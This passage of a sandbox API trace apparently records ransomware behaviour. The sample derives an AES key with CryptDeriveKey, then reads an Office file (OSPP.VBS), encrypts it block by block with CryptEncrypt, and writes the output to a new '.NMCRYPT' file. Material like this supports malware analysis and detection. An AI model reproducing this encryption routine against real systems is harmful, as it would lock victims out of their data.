pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.067] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.068] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0172.068] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.068] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad7f8) returned 1 [0172.068] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0172.068] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0172.068] wcslen (_String="\\\\?\\") returned 0x4 [0172.068] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x9ad778) returned 1 [0172.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0172.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0172.069] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=105382) returned 1 [0172.069] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0172.070] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.089] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.089] GetLastError () returned 0x0 [0172.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.119] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.119] GetLastError () returned 0x0 [0172.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.119] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.119] GetLastError () returned 0x0 [0172.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.120] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.120] GetLastError () returned 0x0 [0172.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.121] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.121] GetLastError () returned 0x0 [0172.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.121] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.121] GetLastError () returned 0x0 [0172.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.121] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.121] GetLastError () returned 0x0 [0172.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.121] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.121] GetLastError () returned 0x0 [0172.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.121] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.121] GetLastError () returned 0x0 [0172.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.122] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.122] GetLastError () returned 0x0 [0172.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.122] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.122] GetLastError () returned 0x0 [0172.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.122] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.122] GetLastError () returned 0x0 [0172.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.122] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.122] GetLastError () returned 0x0 [0172.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.122] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.122] GetLastError () returned 0x0 [0172.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.123] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.123] GetLastError () returned 0x0 [0172.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.123] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.123] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.123] GetLastError () returned 0x0 [0172.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.124] GetLastError () returned 0x0 [0172.124] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.124] GetLastError () returned 0x0 [0172.124] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.124] GetLastError () returned 0x0 [0172.124] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.124] GetLastError () returned 0x0 [0172.124] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.124] GetLastError () returned 0x0 [0172.124] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.124] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.124] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.125] GetLastError () returned 0x0 [0172.125] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.125] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.125] 